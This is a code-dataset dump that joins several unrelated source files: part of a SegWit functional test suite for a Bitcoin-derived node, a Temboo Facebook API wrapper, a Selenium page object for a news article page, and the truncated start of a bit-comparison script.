            tx.wit.vtxinwit.append(CTxInWitness())
            total_value += temp_utxos[i].nValue
        split_value = total_value // num_outputs
        for _ in range(num_outputs):
            tx.vout.append(CTxOut(split_value, script_pubkey))
        for i in range(num_inputs):
            # Now try to sign each input, using a random hashtype.
            anyonecanpay = 0
            if random.randint(0, 1):
                anyonecanpay = SIGHASH_ANYONECANPAY
            hashtype = random.randint(1, 3) | anyonecanpay
            sign_p2pk_witness_input(witness_program, tx, i, hashtype, temp_utxos[i].nValue, key)
            if (hashtype == SIGHASH_SINGLE and i >= num_outputs):
                used_sighash_single_out_of_bounds = True
        tx.rehash()
        for i in range(num_outputs):
            temp_utxos.append(UTXO(tx.sha256, i, split_value))
        temp_utxos = temp_utxos[num_inputs:]

        block.vtx.append(tx)

        # Test the block periodically, if we're close to maxblocksize
        if (get_virtual_size(block) > MAX_BLOCK_BASE_SIZE - 1000):
            self.update_witness_block_with_transactions(block, [])
            test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
            block = self.build_next_block()

    if (not used_sighash_single_out_of_bounds):
        self.log.info("WARNING: this test run didn't attempt SIGHASH_SINGLE with out-of-bounds index value")
    # Test the transactions we've added to the block
    if (len(block.vtx) > 1):
        self.update_witness_block_with_transactions(block, [])
        test_witness_block(self.nodes[0], self.test_node, block, accepted=True)

    # Now test witness version 0 P2PKH transactions
    pubkeyhash = hash160(pubkey)
    script_pkh = key_to_p2wpkh_script(pubkey)
    tx = CTransaction()
    tx.vin.append(CTxIn(COutPoint(temp_utxos[0].sha256, temp_utxos[0].n), b""))
    tx.vout.append(CTxOut(temp_utxos[0].nValue, script_pkh))
    tx.wit.vtxinwit.append(CTxInWitness())
    sign_p2pk_witness_input(witness_program, tx, 0, SIGHASH_ALL, temp_utxos[0].nValue, key)
    tx2 = CTransaction()
    tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
    tx2.vout.append(CTxOut(tx.vout[0].nValue, CScript([OP_TRUE])))

    script = keyhash_to_p2pkh_script(pubkeyhash)
    sig_hash = SegwitV0SignatureHash(script, tx2, 0, SIGHASH_ALL, tx.vout[0].nValue)
    signature = key.sign_ecdsa(sig_hash) + b'\x01'  # 0x1 is SIGHASH_ALL

    # Check that we can't have a scriptSig
    tx2.vin[0].scriptSig = CScript([signature, pubkey])
    block = self.build_next_block()
    self.update_witness_block_with_transactions(block, [tx, tx2])
    test_witness_block(self.nodes[0], self.test_node, block, accepted=False)

    # Move the signature to the witness.
    block.vtx.pop()  # drop the invalid tx2; tx remains in the block
    tx2.wit.vtxinwit.append(CTxInWitness())
    tx2.wit.vtxinwit[0].scriptWitness.stack = [signature, pubkey]
    tx2.vin[0].scriptSig = b""
    tx2.rehash()

    self.update_witness_block_with_transactions(block, [tx2])
    test_witness_block(self.nodes[0], self.test_node, block, accepted=True)

    temp_utxos.pop(0)

    # Update self.utxos for later tests by creating two outputs
    # that consolidate all the coins in temp_utxos.
    output_value = sum(i.nValue for i in temp_utxos) // 2

    tx = CTransaction()
    index = 0
    # Just spend to our usual anyone-can-spend output
    tx.vout = [CTxOut(output_value, CScript([OP_TRUE]))] * 2
    for i in temp_utxos:
        # Use SIGHASH_ALL|SIGHASH_ANYONECANPAY so we can build up
        # the signatures as we go.
        tx.vin.append(CTxIn(COutPoint(i.sha256, i.n), b""))
        tx.wit.vtxinwit.append(CTxInWitness())
        sign_p2pk_witness_input(witness_program, tx, index, SIGHASH_ALL | SIGHASH_ANYONECANPAY, i.nValue, key)
        index += 1
    block = self.build_next_block()
    self.update_witness_block_with_transactions(block, [tx])
    test_witness_block(self.nodes[0], self.test_node, block, accepted=True)

    for i in range(len(tx.vout)):
        self.utxo.append(UTXO(tx.sha256, i, tx.vout[i].nValue))
@subtest  # type: ignore
def test_non_standard_witness_blinding(self):
    """Test behavior of unnecessary witnesses in transactions does not blind the node for the transaction"""
    # Create a p2sh output -- this is so we can pass the standardness
    # rules (an anyone-can-spend OP_TRUE would be rejected, if not wrapped
    # in P2SH).
    p2sh_program = CScript([OP_TRUE])
    script_pubkey = script_to_p2sh_script(p2sh_program)

    # Now check that unnecessary witnesses can't be used to blind a node
    # to a transaction, eg by violating standardness checks.
    tx = CTransaction()
    tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
    tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
    tx.rehash()
    test_transaction_acceptance(self.nodes[0], self.test_node, tx, False, True)
    self.nodes[0].generate(1)
    self.sync_blocks()

    # We'll add an unnecessary witness to this transaction that would cause
    # it to be non-standard, to test that violating policy with a witness
    # doesn't blind a node to a transaction. Transactions
    # rejected for having a witness shouldn't be added
    # to the rejection cache.
    tx2 = CTransaction()
    tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), CScript([p2sh_program])))
    tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, script_pubkey))
    tx2.wit.vtxinwit.append(CTxInWitness())
    tx2.wit.vtxinwit[0].scriptWitness.stack = [b'a' * 400]
    tx2.rehash()
    # This will be rejected due to a policy check:
    # No witness is allowed, since it is not a witness program but a p2sh program
    test_transaction_acceptance(self.nodes[1], self.std_node, tx2, True, False, 'bad-witness-nonstandard')

    # If we send without witness, it should be accepted.
    test_transaction_acceptance(self.nodes[1], self.std_node, tx2, False, True)

    # Now create a new anyone-can-spend utxo for the next test.
    tx3 = CTransaction()
    tx3.vin.append(CTxIn(COutPoint(tx2.sha256, 0), CScript([p2sh_program])))
    tx3.vout.append(CTxOut(tx2.vout[0].nValue - 1000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])))
    tx3.rehash()
    test_transaction_acceptance(self.nodes[0], self.test_node, tx2, False, True)
    test_transaction_acceptance(self.nodes[0], self.test_node, tx3, False, True)

    self.nodes[0].generate(1)
    self.sync_blocks()

    # Update our utxo list; we spent the first entry.
    self.utxo.pop(0)
    self.utxo.append(UTXO(tx3.sha256, 0, tx3.vout[0].nValue))
@subtest  # type: ignore
def test_non_standard_witness(self):
    """Test detection of non-standard P2WSH witness"""
    pad = chr(1).encode('latin-1')  # single 0x01 byte used as stack-element filler

    # Create scripts for tests
    scripts = []
    scripts.append(CScript([OP_DROP] * 100))
    scripts.append(CScript([OP_DROP] * 99))
    scripts.append(CScript([pad * 59] * 59 + [OP_DROP] * 60))
    scripts.append(CScript([pad * 59] * 59 + [OP_DROP] * 61))

    p2wsh_scripts = []

    tx = CTransaction()
    tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))

    # For each script, generate a pair of P2WSH and P2SH-P2WSH output.
    outputvalue = (self.utxo[0].nValue - 1000) // (len(scripts) * 2)
    for i in scripts:
        p2wsh = script_to_p2wsh_script(i)
        p2wsh_scripts.append(p2wsh)
        tx.vout.append(CTxOut(outputvalue, p2wsh))
        tx.vout.append(CTxOut(outputvalue, script_to_p2sh_script(p2wsh)))
    tx.rehash()
    txid = tx.sha256
    test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=False, accepted=True)

    self.nodes[0].generate(1)
    self.sync_blocks()

    # Creating transactions for tests
    p2wsh_txs = []
    p2sh_txs = []
    for i in range(len(scripts)):
        p2wsh_tx = CTransaction()
        p2wsh_tx.vin.append(CTxIn(COutPoint(txid, i * 2)))
        p2wsh_tx.vout.append(CTxOut(outputvalue - 5000, CScript([OP_0, hash160(b"")])))
        p2wsh_tx.wit.vtxinwit.append(CTxInWitness())
        p2wsh_tx.rehash()
        p2wsh_txs.append(p2wsh_tx)
        p2sh_tx = CTransaction()
        p2sh_tx.vin.append(CTxIn(COutPoint(txid, i * 2 + 1), CScript([p2wsh_scripts[i]])))
        p2sh_tx.vout.append(CTxOut(outputvalue - 5000, CScript([OP_0, hash160(b"")])))
        p2sh_tx.wit.vtxinwit.append(CTxInWitness())
        p2sh_tx.rehash()
        p2sh_txs.append(p2sh_tx)

    # Testing native P2WSH
    # Witness stack size, excluding witnessScript, over 100 is non-standard
    p2wsh_txs[0].wit.vtxinwit[0].scriptWitness.stack = [pad] * 101 + [scripts[0]]
    test_transaction_acceptance(self.nodes[1], self.std_node, p2wsh_txs[0], True, False, 'bad-witness-nonstandard')
    # Non-standard nodes should accept
    test_transaction_acceptance(self.nodes[0], self.test_node, p2wsh_txs[0], True, True)

    # Stack element size over 80 bytes is non-standard
    p2wsh_txs[1].wit.vtxinwit[0].scriptWitness.stack = [pad * 81] * 100 + [scripts[1]]
    test_transaction_acceptance(self.nodes[1], self.std_node, p2wsh_txs[1], True, False, 'bad-witness-nonstandard')
    # Non-standard nodes should accept
    test_transaction_acceptance(self.nodes[0], self.test_node, p2wsh_txs[1], True, True)
    # Standard nodes should accept if element size is not over 80 bytes
    p2wsh_txs[1].wit.vtxinwit[0].scriptWitness.stack = [pad * 80] * 100 + [scripts[1]]
    test_transaction_acceptance(self.nodes[1], self.std_node, p2wsh_txs[1], True, True)

    # witnessScript size at 3600 bytes is standard
    p2wsh_txs[2].wit.vtxinwit[0].scriptWitness.stack = [pad, pad, scripts[2]]
    test_transaction_acceptance(self.nodes[0], self.test_node, p2wsh_txs[2], True, True)
    test_transaction_acceptance(self.nodes[1], self.std_node, p2wsh_txs[2], True, True)

    # witnessScript size at 3601 bytes is non-standard
    p2wsh_txs[3].wit.vtxinwit[0].scriptWitness.stack = [pad, pad, pad, scripts[3]]
    test_transaction_acceptance(self.nodes[1], self.std_node, p2wsh_txs[3], True, False, 'bad-witness-nonstandard')
    # Non-standard nodes should accept
    test_transaction_acceptance(self.nodes[0], self.test_node, p2wsh_txs[3], True, True)

    # Repeating the same tests with P2SH-P2WSH
    p2sh_txs[0].wit.vtxinwit[0].scriptWitness.stack = [pad] * 101 + [scripts[0]]
    test_transaction_acceptance(self.nodes[1], self.std_node, p2sh_txs[0], True, False, 'bad-witness-nonstandard')
    test_transaction_acceptance(self.nodes[0], self.test_node, p2sh_txs[0], True, True)
    p2sh_txs[1].wit.vtxinwit[0].scriptWitness.stack = [pad * 81] * 100 + [scripts[1]]
    test_transaction_acceptance(self.nodes[1], self.std_node, p2sh_txs[1], True, False, 'bad-witness-nonstandard')
    test_transaction_acceptance(self.nodes[0], self.test_node, p2sh_txs[1], True, True)
    p2sh_txs[1].wit.vtxinwit[0].scriptWitness.stack = [pad * 80] * 100 + [scripts[1]]
    test_transaction_acceptance(self.nodes[1], self.std_node, p2sh_txs[1], True, True)
    p2sh_txs[2].wit.vtxinwit[0].scriptWitness.stack = [pad, pad, scripts[2]]
    test_transaction_acceptance(self.nodes[0], self.test_node, p2sh_txs[2], True, True)
    test_transaction_acceptance(self.nodes[1], self.std_node, p2sh_txs[2], True, True)
    p2sh_txs[3].wit.vtxinwit[0].scriptWitness.stack = [pad, pad, pad, scripts[3]]
    test_transaction_acceptance(self.nodes[1], self.std_node, p2sh_txs[3], True, False, 'bad-witness-nonstandard')
    test_transaction_acceptance(self.nodes[0], self.test_node, p2sh_txs[3], True, True)

    self.nodes[0].generate(1)  # Mine and clean up the mempool of non-standard node
    # Valid but non-standard transactions in a block should be accepted by standard node
    self.sync_blocks()
    assert_equal(len(self.nodes[0].getrawmempool()), 0)
    assert_equal(len(self.nodes[1].getrawmempool()), 0)

    self.utxo.pop(0)
@subtest  # type: ignore
def test_upgrade_after_activation(self):
    """Test the behavior of starting up a segwit-aware node after the softfork has activated."""
    # All nodes are caught up and node 2 is a pre-segwit node that will soon upgrade.
    for n in range(2):
        assert_equal(self.nodes[n].getblockcount(), self.nodes[2].getblockcount())
        assert softfork_active(self.nodes[n], "segwit")
    assert SEGWIT_HEIGHT < self.nodes[2].getblockcount()
    assert 'segwit' not in self.nodes[2].getblockchaininfo()['softforks']

    # Restarting node 2 should result in a shutdown because the blockchain consists of
    # insufficiently validated blocks per segwit consensus rules.
    self.stop_node(2)
    self.nodes[2].assert_start_raises_init_error(
        extra_args=[f"-segwitheight={SEGWIT_HEIGHT}"],
        expected_msg=f": Witness data for blocks after height {SEGWIT_HEIGHT} requires validation. Please restart with -reindex..\nPlease restart with -reindex or -reindex-chainstate to recover.",
    )

    # As directed, the user restarts the node with -reindex
    self.start_node(2, extra_args=["-reindex", f"-segwitheight={SEGWIT_HEIGHT}"])

    # With the segwit consensus rules, the node is able to validate only up to SEGWIT_HEIGHT - 1
    assert_equal(self.nodes[2].getblockcount(), SEGWIT_HEIGHT - 1)
    self.connect_nodes(0, 2)

    # We reconnect more than 100 blocks, give it plenty of time
    # sync_blocks() also verifies the best block hash is the same for all nodes
    self.sync_blocks(timeout=240)

    # The upgraded node should now have segwit activated
    assert softfork_active(self.nodes[2], "segwit")
@subtest  # type: ignore
def test_witness_sigops(self):
    """Test sigop counting is correct inside witnesses."""
    # Keep this under MAX_OPS_PER_SCRIPT (201)
    witness_program = CScript([OP_TRUE, OP_IF, OP_TRUE, OP_ELSE] + [OP_CHECKMULTISIG] * 5 + [OP_CHECKSIG] * 193 + [OP_ENDIF])
    script_pubkey = script_to_p2wsh_script(witness_program)

    # Each CHECKMULTISIG counts as 20 sigops, each CHECKSIG as 1.
    sigops_per_script = 20 * 5 + 193 * 1
    # We'll produce 2 extra outputs, one with a program that would take us
    # over max sig ops, and one with a program that would exactly reach max
    # sig ops
    outputs = (MAX_SIGOP_COST // sigops_per_script) + 2
    extra_sigops_available = MAX_SIGOP_COST % sigops_per_script

    # We chose the number of checkmultisigs/checksigs to make this work:
    assert extra_sigops_available < 100  # steer clear of MAX_OPS_PER_SCRIPT

    # This script, when spent with the first
    # N(=MAX_SIGOP_COST//sigops_per_script) outputs of our transaction,
    # would push us just over the block sigop limit.
    witness_program_toomany = CScript([OP_TRUE, OP_IF, OP_TRUE, OP_ELSE] + [OP_CHECKSIG] * (extra_sigops_available + 1) + [OP_ENDIF])
    script_pubkey_toomany = script_to_p2wsh_script(witness_program_toomany)

    # If we spend this script instead, we would exactly reach our sigop
    # limit (for witness sigops).
    witness_program_justright = CScript([OP_TRUE, OP_IF, OP_TRUE, OP_ELSE] + [OP_CHECKSIG] * (extra_sigops_available) + [OP_ENDIF])
    script_pubkey_justright = script_to_p2wsh_script(witness_program_justright)

    # First split our available utxo into a bunch of outputs
    split_value = self.utxo[0].nValue // outputs
    tx = CTransaction()
    tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
    for _ in range(outputs):
        tx.vout.append(CTxOut(split_value, script_pubkey))
    # The last two outputs get the boundary-case programs.
    tx.vout[-2].scriptPubKey = script_pubkey_toomany
    tx.vout[-1].scriptPubKey = script_pubkey_justright
    tx.rehash()

    block_1 = self.build_next_block()
    self.update_witness_block_with_transactions(block_1, [tx])
    test_witness_block(self.nodes[0], self.test_node, block_1, accepted=True)

    tx2 = CTransaction()
    # If we try to spend the first n-1 outputs from tx, that should be
    # too many sigops.
    total_value = 0
    for i in range(outputs - 1):
        tx2.vin.append(CTxIn(COutPoint(tx.sha256, i), b""))
        tx2.wit.vtxinwit.append(CTxInWitness())
        tx2.wit.vtxinwit[-1].scriptWitness.stack = [witness_program]
        total_value += tx.vout[i].nValue
    # The final input spends the "toomany" output, tipping us over the limit.
    tx2.wit.vtxinwit[-1].scriptWitness.stack = [witness_program_toomany]
    tx2.vout.append(CTxOut(total_value, CScript([OP_TRUE])))
    tx2.rehash()

    block_2 = self.build_next_block()
    self.update_witness_block_with_transactions(block_2, [tx2])
    test_witness_block(self.nodes[0], self.test_node, block_2, accepted=False)

    # Try dropping the last input in tx2, and add an output that has
    # too many sigops (contributing to legacy sigop count).
    checksig_count = (extra_sigops_available // 4) + 1
    script_pubkey_checksigs = CScript([OP_CHECKSIG] * checksig_count)
    tx2.vout.append(CTxOut(0, script_pubkey_checksigs))
    tx2.vin.pop()
    tx2.wit.vtxinwit.pop()
    tx2.vout[0].nValue -= tx.vout[-2].nValue
    tx2.rehash()
    block_3 = self.build_next_block()
    self.update_witness_block_with_transactions(block_3, [tx2])
    test_witness_block(self.nodes[0], self.test_node, block_3, accepted=False)

    # If we drop the last checksig in this output, the tx should succeed.
    block_4 = self.build_next_block()
    tx2.vout[-1].scriptPubKey = CScript([OP_CHECKSIG] * (checksig_count - 1))
    tx2.rehash()
    self.update_witness_block_with_transactions(block_4, [tx2])
    test_witness_block(self.nodes[0], self.test_node, block_4, accepted=True)

    # Reset the tip back down for the next test
    self.sync_blocks()
    for x in self.nodes:
        x.invalidateblock(block_4.hash)

    # Try replacing the last input of tx2 to be spending the last
    # output of tx
    block_5 = self.build_next_block()
    tx2.vout.pop()
    tx2.vin.append(CTxIn(COutPoint(tx.sha256, outputs - 1), b""))
    tx2.wit.vtxinwit.append(CTxInWitness())
    tx2.wit.vtxinwit[-1].scriptWitness.stack = [witness_program_justright]
    tx2.rehash()
    self.update_witness_block_with_transactions(block_5, [tx2])
    test_witness_block(self.nodes[0], self.test_node, block_5, accepted=True)

    # TODO: test p2sh sigop counting

    # Cleanup and prep for next test
    self.utxo.pop(0)
    self.utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
@subtest  # type: ignore
def test_superfluous_witness(self):
    """Test node handling of transactions serialized with a bogus witness
    marker/flag byte (flag forced to 3 instead of the standard 1)."""
    # Serialization of tx that puts witness flag to 3 always
    def serialize_with_bogus_witness(tx):
        # Mirrors CTransaction witness serialization, but hard-codes flags=3
        # so bit 2 (an unknown optional-data bit) is always set.
        flags = 3
        r = b""
        r += struct.pack("<i", tx.nVersion)
        if flags:
            dummy = []
            r += ser_vector(dummy)
            r += struct.pack("<B", flags)
        r += ser_vector(tx.vin)
        r += ser_vector(tx.vout)
        if flags & 1:
            if (len(tx.wit.vtxinwit) != len(tx.vin)):
                # vtxinwit must have the same length as vin
                tx.wit.vtxinwit = tx.wit.vtxinwit[:len(tx.vin)]
                for _ in range(len(tx.wit.vtxinwit), len(tx.vin)):
                    tx.wit.vtxinwit.append(CTxInWitness())
            r += tx.wit.serialize()
        r += struct.pack("<I", tx.nLockTime)
        return r

    class msg_bogus_tx(msg_tx):
        # A tx message that always serializes with the bogus flag byte.
        def serialize(self):
            return serialize_with_bogus_witness(self.tx)

    self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(address_type='bech32'), 5)
    self.nodes[0].generate(1)
    unspent = next(u for u in self.nodes[0].listunspent() if u['spendable'] and u['address'].startswith('bcrt'))

    raw = self.nodes[0].createrawtransaction([{"txid": unspent['txid'], "vout": unspent['vout']}], {self.nodes[0].getnewaddress(): 1})
    tx = tx_from_hex(raw)
    # Unsigned tx (empty witness): decoding with iswitness=True must fail ...
    assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].decoderawtransaction, hexstring=serialize_with_bogus_witness(tx).hex(), iswitness=True)
    # ... and the p2p deserializer logs a superfluous witness record.
    with self.nodes[0].assert_debug_log(['Superfluous witness record']):
        self.test_node.send_and_ping(msg_bogus_tx(tx))
    raw = self.nodes[0].signrawtransactionwithwallet(raw)
    assert raw['complete']
    raw = raw['hex']
    tx = tx_from_hex(raw)
    # Signed tx (witness present): still fails to decode, and the unknown
    # flag bit is reported as unknown optional data.
    assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].decoderawtransaction, hexstring=serialize_with_bogus_witness(tx).hex(), iswitness=True)
    with self.nodes[0].assert_debug_log(['Unknown transaction optional data']):
        self.test_node.send_and_ping(msg_bogus_tx(tx))
@subtest  # type: ignore
def test_wtxid_relay(self):
    """Test wtxid-based transaction relay negotiation and getdata behavior
    for peers with and without wtxidrelay enabled."""
    # Use brand new nodes to avoid contamination from earlier tests
    self.wtx_node = self.nodes[0].add_p2p_connection(TestP2PConn(wtxidrelay=True), services=NODE_NETWORK | NODE_WITNESS)
    self.tx_node = self.nodes[0].add_p2p_connection(TestP2PConn(wtxidrelay=False), services=NODE_NETWORK | NODE_WITNESS)

    # Check wtxidrelay feature negotiation message through connecting a new peer
    def received_wtxidrelay():
        return (len(self.wtx_node.last_wtxidrelay) > 0)
    self.wtx_node.wait_until(received_wtxidrelay)

    # Create a Segwit output from the latest UTXO
    # and announce it to the network
    witness_program = CScript([OP_TRUE])
    script_pubkey = script_to_p2wsh_script(witness_program)

    tx = CTransaction()
    tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
    tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
    tx.rehash()

    # Create a Segwit transaction
    tx2 = CTransaction()
    tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
    tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, script_pubkey))
    tx2.wit.vtxinwit.append(CTxInWitness())
    tx2.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
    tx2.rehash()

    # Announce Segwit transaction with wtxid
    # and wait for getdata
    self.wtx_node.announce_tx_and_wait_for_getdata(tx2, use_wtxid=True)
    with p2p_lock:
        lgd = self.wtx_node.lastgetdata[:]
    assert_equal(lgd, [CInv(MSG_WTX, tx2.calc_sha256(True))])

    # Announce Segwit transaction from non wtxidrelay peer
    # and wait for getdata
    self.tx_node.announce_tx_and_wait_for_getdata(tx2, use_wtxid=False)
    with p2p_lock:
        lgd = self.tx_node.lastgetdata[:]
    assert_equal(lgd, [CInv(MSG_TX|MSG_WITNESS_FLAG, tx2.sha256)])

    # Send tx2 through; it's an orphan so won't be accepted
    with p2p_lock:
        self.wtx_node.last_message.pop("getdata", None)
    test_transaction_acceptance(self.nodes[0], self.wtx_node, tx2, with_witness=True, accepted=False)

    # Expect a request for parent (tx) by txid despite use of WTX peer
    self.wtx_node.wait_for_getdata([tx.sha256], 60)
    with p2p_lock:
        lgd = self.wtx_node.lastgetdata[:]
    assert_equal(lgd, [CInv(MSG_WITNESS_TX, tx.sha256)])

    # Send tx through
    test_transaction_acceptance(self.nodes[0], self.wtx_node, tx, with_witness=False, accepted=True)

    # Check tx2 is there now
    assert_equal(tx2.hash in self.nodes[0].getrawmempool(), True)
if __name__ == '__main__':
    # Run the full SegWit functional test suite when invoked as a script.
    SegWitTest().main()
| [
"contact@ocvcoin.com"
] | contact@ocvcoin.com |
071cd8751ab4d3c34048353a7eaa7e15171d75b1 | 44064ed79f173ddca96174913910c1610992b7cb | /Second_Processing_app/temboo/Library/Facebook/Actions/Fitness/Walks/UpdateWalk.py | 493e93d6dc4ff63b1d782b571214053924414cfc | [] | no_license | dattasaurabh82/Final_thesis | 440fb5e29ebc28dd64fe59ecd87f01494ed6d4e5 | 8edaea62f5987db026adfffb6b52b59b119f6375 | refs/heads/master | 2021-01-20T22:25:48.999100 | 2014-10-14T18:58:00 | 2014-10-14T18:58:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,177 | py | # -*- coding: utf-8 -*-
###############################################################################
#
# UpdateWalk
# Updates an existing walk action.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class UpdateWalk(Choreography):
    """Temboo Choreography for Facebook's UpdateWalk action, which
    updates an existing walk action on the user's timeline."""

    def __init__(self, temboo_session):
        """
        Bind this Choreo to *temboo_session*, a TembooSession object that
        holds a valid set of Temboo credentials.
        """
        Choreography.__init__(self, temboo_session, '/Library/Facebook/Actions/Fitness/Walks/UpdateWalk')

    def new_input_set(self):
        """Return a fresh, empty input set for this Choreo."""
        input_set = UpdateWalkInputSet()
        return input_set

    def _make_result_set(self, result, path):
        """Wrap a raw execution *result* in an UpdateWalkResultSet."""
        result_set = UpdateWalkResultSet(result, path)
        return result_set

    def _make_execution(self, session, exec_id, path):
        """Build the object used to track an in-flight Choreo execution."""
        execution = UpdateWalkChoreographyExecution(session, exec_id, path)
        return execution
class UpdateWalkInputSet(InputSet):
    """
    Input container for the UpdateWalk Choreo.  Each ``set_*`` method
    records one named input value to be sent when the Choreo executes.
    """
    def set_AccessToken(self, value):
        """AccessToken: (required, string) The access token retrieved from the final step of the OAuth process."""
        self._set_input('AccessToken', value)

    def set_ActionID(self, value):
        """ActionID: (required, string) The id of the action to update."""
        self._set_input('ActionID', value)

    def set_Course(self, value):
        """Course: (optional, string) The URL or ID for an Open Graph object representing the course."""
        self._set_input('Course', value)

    def set_EndTime(self, value):
        """EndTime: (optional, date) The time that the user ended the action (e.g. 2013-06-24T18:53:35+0000)."""
        self._set_input('EndTime', value)

    def set_ExpiresIn(self, value):
        """ExpiresIn: (optional, integer) The amount of time (in milliseconds) from the publish_time that the action will expire."""
        self._set_input('ExpiresIn', value)

    def set_Message(self, value):
        """Message: (optional, string) A message attached to this action. Setting this parameter requires enabling of message capabilities."""
        self._set_input('Message', value)

    def set_Place(self, value):
        """Place: (optional, string) The URL or ID for an Open Graph object representing the location associated with this action."""
        self._set_input('Place', value)

    def set_Tags(self, value):
        """Tags: (optional, string) A comma separated list of other profile IDs that also performed this action."""
        self._set_input('Tags', value)
class UpdateWalkResultSet(ResultSet):
    """
    A ResultSet with methods tailored to the values returned by the UpdateWalk Choreo.
    The ResultSet object is used to retrieve the results of a Choreo execution.
    """
    def getJSONFromString(self, str):
        # NOTE(review): the parameter name shadows the built-in `str`;
        # harmless here, but worth renaming when the template is regenerated.
        return json.loads(str)
    def get_Response(self):
        """
        Retrieve the value for the "Response" output from this Choreo execution. ((boolean) The response from Facebook.)
        """
        return self._output.get('Response', None)
class UpdateWalkChoreographyExecution(ChoreographyExecution):
    """
    Tracks an in-flight execution of the UpdateWalk Choreo and builds
    its result set when the run completes.
    """
    def _make_result_set(self, response, path):
        return UpdateWalkResultSet(response, path)
| [
"dattasaurabh82@gmail.com"
] | dattasaurabh82@gmail.com |
609329789cfd420c62d86257a45a1e058b0604ad | cf8762eaeaf9b7f5fb0c7e5ef2b3c91c2543064a | /pages/recall_article_page.py | 8eca901a5773491a157cbe36000cdb8eb6cc1f6c | [] | no_license | metheuspsc/ca-test-automation | 7357de166555a4fea1753b444e5a3743599ff181 | 17936cf3008325bcaba7e3f1a1ff951f4218e378 | refs/heads/master | 2023-08-07T12:53:36.666330 | 2021-09-28T03:56:16 | 2021-09-28T03:56:16 | 409,317,389 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,799 | py | from selenium.webdriver.common.by import By
from pages.base_page import BasePage
class RecallArticlePage(BasePage):
    """Page object for a recall news article.

    Assumption: locators are declared inside the methods to simplify.
    `self.browser` and `self.url` are presumably provided by BasePage --
    confirm against the base class.
    """
    @property
    def expected_twitter_share_url(self):
        # Share-intent URL the Twitter button is expected to point at.
        # NOTE(review): the title is interpolated without URL-encoding --
        # verify titles containing spaces/special characters still match.
        return f"{'https://twitter.com/intent/tweet/?'}text={self.get_title()}&via=ConsumerAffairs&url={self.url}"
    @property
    def expected_facebook_share_url(self):
        # Facebook sharer URL built from the current article URL.
        return "https://www.facebook.com/sharer.php?u=" + self.url
    @property
    def expected_email_share_url(self):
        # mailto: link expected behind the e-mail share button (unencoded).
        return "mailto:?subject=Check this ConsumerAffairs News&body=Check out this news: " + self.url
    def get_disclaimer_text(self):
        locator = (By.CLASS_NAME, "js-discl")
        return self.browser.text(locator)
    def get_title(self):
        # Article headline (schema.org itemprop="headline").
        locator = (By.XPATH, "//h1[@itemprop='headline']")
        return self.browser.text(locator)
    def get_footer_text(self):
        locator = (By.XPATH, "//div[@class='ca-ft__ctnt']//p")
        return self.browser.text(locator)
    def get_how_it_works_href(self):
        locator = (By.XPATH, "//a[@aria-label='Learn more about us via our FAQ page']")
        return self.browser.get_href(locator)
    def get_facebook_share_href(self):
        locator = (By.XPATH, "//a[@title='Share on Facebook']")
        return self.browser.get_href(locator)
    def get_twitter_share_href(self):
        locator = (By.XPATH, "//a[@title='Share on Twitter']")
        return self.browser.get_href(locator)
    def get_email_share_href(self):
        locator = (By.XPATH, "//a[@title='Share via Email']")
        return self.browser.get_href(locator)
    def fill_zip_code(self, zip_code):
        # Type the given ZIP code into the matcher form.
        locator = (By.XPATH, "//input[@name='zip']")
        return self.browser.do_send_keys(locator, zip_code)
    def click_find_my_match(self):
        locator = (By.CLASS_NAME, "ca-mt-zip__btn")
        return self.browser.click_and_wait_redirect(locator)
    def close_modal(self):
        # Dismiss the pop-up modal if (and only if) it is present.
        locator = (By.XPATH, "//a[@class='ca-modal_close']")
        if self.browser.find_elements(locator[0], locator[1]):
            self.browser.do_click(locator)
    def get_related_news(self):
        """Returns a list with the first and the last news on the latest news modal"""
        # NOTE(review): when exactly one related link exists this returns
        # a bare string rather than a list -- inconsistent with the
        # docstring; confirm callers handle both shapes.
        locator = (By.CSS_SELECTOR, "#sidebar > nav.h-sect--pad-2.h-coll-vert.article-links.related-links")
        related_news_box = self.browser.wait_for_element(locator)
        related_news = related_news_box.find_elements(By.CSS_SELECTOR, "a")
        if related_news:
            if len(related_news) == 1:
                return related_news[0].get_attribute("href")
            return [
                related_news[0].get_attribute("href"),
                related_news[-1].get_attribute("href"),
            ]
        return []
| [
"matheuspsc@gmail.com"
] | matheuspsc@gmail.com |
7e95c4afa11a45fa01dc3edc9be96d2534ed7689 | b1b35e2d2ba2c3fdda94a0680a06ca0f71595a4e | /app/test/data/message/bitdiff.py | f6528d4abbca03674bd202df465c81c42f906684 | [] | no_license | GriffinSchneider/Steganopodous | 86857a0dba62a2ce0acbef232a9e95267693bab8 | 444594e6cc8eff78dded636c5f547e3296d8247d | refs/heads/master | 2016-09-06T02:42:35.692669 | 2012-04-17T19:14:51 | 2012-04-17T19:14:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 489 | py | #!/usr/bin/env python
from bitstream import BitStream
import sys
def compare(file1, file2):
    """Return the fraction of matching bits between two files.

    file1 and file2 are open file objects; each is wrapped in a
    BitStream and the streams are compared bit-by-bit up to the length
